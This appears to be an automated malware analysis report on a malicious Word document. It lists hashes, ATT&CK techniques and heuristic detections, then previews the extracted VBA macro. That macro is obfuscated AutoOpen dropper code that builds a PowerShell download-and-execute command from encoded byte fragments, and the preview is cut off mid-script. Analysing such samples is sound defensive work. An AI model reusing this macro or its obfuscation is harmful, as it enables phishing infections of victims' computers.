Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bae854d8c05b0de0…

MALICIOUS

Office (OLE)

104.8 KB Created: 2018-06-20 07:01:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: f9591d368f5e50442ca478bfc209fa5f SHA-1: 78ee4b5333553e08a0f0b50939bdd994fc4cf037 SHA-256: bae854d8c05b0de096083e4ed012d0b68eea6132d258b2872ac585fdb0c8ceaa
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro with an AutoOpen function. This macro uses Shell() to execute a PowerShell command. The PowerShell command is constructed by concatenating strings and byte arrays, ultimately forming a command to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6592056-0' further supports its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6592056-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592056-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13385 bytes
SHA-256: 1672e9893d63c030fe4a880c3c0bbc52abcdc40dd75253d3308b17a5d311fc94
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rAzWVtS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jmpJVPTbDEXHPl"
Function zkFkO()
On Error Resume Next
jpldp = whiKp
YBaiGQ = CDate(47954)
rIwttU = 86526
SmcvpR = 11523
TjjFc = CByte(zauYn)
INLIP = CDate(NTsbip + Sin(20388 + 24038) * 9741 * CInt(73544))
dzTVa = "OwerSHe" + "ll .( $pSHoME[" + "4]+$psHOMe[34]+" + "'x') ( -" + "jOIn" + " (( 28,1" + "07" + " ,107 ,82, 81,"
wtuwM = HOwwL
NbljX = CDate(71969)
bpiKf = 66209
EwnuIf = 85775
uzdMw = CByte(VZbnaT)
oBuVv = CDate(NhqHbz + Sin(14061 + 70301) * 7230 * CInt(68642))
jVbiaYcn = "91 ,2" + "4, 5 ,24" + ",86,93" + " ,79,21 ,87,90" + ", 82,93, 9" + "1,76, 24 , 7"
BIVOJ = fDsQB
mGzCC = CDate(65179)
HQzan = 67824
uXFzL = 45666
McLYJ = CByte(jkdrdb)
IoDwFL = CDate(thwTId + Sin(64297 + 92157) * 73713 * CInt(73650))
wNmzFM = "4 ,89" + " ,86 " + ",92 , 87" + " ," + "85 ,3 ,28, 8"
ZahIP = jjRtZ
ATCSPr = CDate(27081)
MTwLq = 6000
Rfvwpi = 52886
XUwSqU = CByte(iAZQu)
wCfVY = CDate(ZEDwi + Sin(21327 + 55884) * 60416 * CInt(22046))
RPlvV = "1 , 78,72,1" + "11,91 ,79, 24,5" + " , 24 ," + "86 , 93 , " + "79 ,21 , 8" + "7 ,90,82 ,93 ,"
ElUmFn = sCuTsn
zEfnf = CDate(75109)
SzSHl = 50965
GnYbF = 25010
cmjBUH = CByte(tpKFmZ)
BjWwD = CDate(mcHaWp + Sin(50020 + 6639) * 89941 * CInt(66436))
HnZQNp = "91,7" + "6,24 , 1" + "07 ," + "65 ," + "75" + " , " + "76, 93," + " 85 , 22,118,9" + "3,76 ,22 "
XzlMU = fNawPN
BzTjU = CDate(12188)
QNKQi = 69908
jOiSvz = 82648
zzTEVn = CByte(tSlwsm)
BBcoV = CDate(oYJVXD + Sin(265 + 90393) * 5961 * CInt(52090))
VZMcwG = ", 111 ,93 ,9" + "0, 123 ,84 ,81" + ",93 , 86 ," + " 76 ,3, 28 ,79 " + ",87,106,82, " + "82 , 92, 24 , 5"
zkFkO = dzTVa + jVbiaYcn + wNmzFM + RPlvV + HnZQNp + VZMcwG
End Function
Function YuprzN()
On Error Resume Next
nlQom = tIPNj
zbvsY = CDate(21525)
AwuUJ = 30915
oEGVJq = 51943
omLwY = CByte(MUVDh)
pJZhz = CDate(kzXBq + Sin(84038 + 21780) * 43387 * CInt(11976))
JQjfN = " , 24" + ",31,80 ,76, 76," + " 72, 2, 23 , 23" + " , 79,79 , "
sqCmz = NnJGAw
PQSlW = CDate(81560)
PFLto = 10173
aWwuWY = 17798
TiLVsr = CByte(HGIWj)
SuVhU = CDate(qJiZXz + Sin(63437 + 61094) * 51240 * CInt(58914))
jUksjYT = "79" + " , 22,85, 22,8" + "5 , 89, 9" + "5,86,93," + "76 , 85 , 89 ," + " 74,83," + "93,76 , " + "81 ,"
YjrKV = iBjpH
LpqLvz = CDate(920)
BwAsZh = 70979
jiikV = 24603
zoolO = CByte(fnYVuH)
mJBVZ = CDate(uCtXSc + Sin(31022 + 19853) * 34309 * CInt(21814))
wVZUIaXaAX = "86,95,84" + ",84 ,9" + "1,2" + "2, 91 , 87,85,2"
ihHPbi = WQwzBw
TqAms = CDate(25119)
nQpCll = 59684
RErnkD = 70044
bfiAXf = CByte(WTJqRJ)
ksuzmY = CDate(jdGZqC + Sin(5536 + 42817) * 8660 * CInt(79312))
ViHfBOdIo = "3 ,77 " + ", 118, " + "121 ,0,23" + ", 120,80 , 76, " + "76, 72 , 2 ,23,"
NpwfmS = WUBTw
QIzjb = CDate(13624)
CnpDR = 52237
DNvlC = 14342
UzlLB = CByte(flVQP)
YwLjUm = CDate(XfUZY + Sin(25610 + 38829) * 30638 * CInt(92573))
majLQXw = "23,79 ,79, 79" + " ,22,84,93 ," + "75,8" + "6,81 ,"
YuprzN = JQjfN + jUksjYT + wVZUIaXaAX + ViHfBOdIo + majLQXw
End Function
Function RHMjoHJ()
On Error Resume Next
TnDhb = kRbUCR
joMzkj = CDate(47453)
ORZBq = 199
VRYAjQ = 50999
vsChA = CByte(AVlKA)
QMcbRI = CDate(kwQvpm + Sin(1924 + 52171) * 58155 * CInt(35323))
JnpOJbsRmT = "91 ,80, 81 , 8" + "6 ,22, 74 , 77," + "23" + ",117,108 , 124," + " 1, 10," + "90, 11 ,23," + "120 ,80,7" + "6 , 7" + "6 , 72 ,2,23,"
sYPZV = 29024
UkWIf = SwZjQ
XNArO = CDate(CaOoIF + Sin(43778 + 48506) * 36020 * CInt(92053))
wfNih = CByte(NlXik)
qzhTii = CDate(52899)
Fhuup = 76819
QEWzqOj = "23,79 ," + " 7" + "9 ,79, 2" + "2, 12 ,22 , 86" + " ,81 ,83," + "81" + " , 76 ,89,0" + ",1"
fVTpPm = 44310
RjZsS = pYwXzc
HOLhl = CDate(QkAuHV + Sin(17022 + 33706) * 85176 * CInt(37480))
ZiTRhl = CByte(OuERr)
itoIl = CDate(30352)
hdWNcL = 37219
NOWbquFU = "4,22 ," + " 66, 0, 22, " + "74 ,7
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.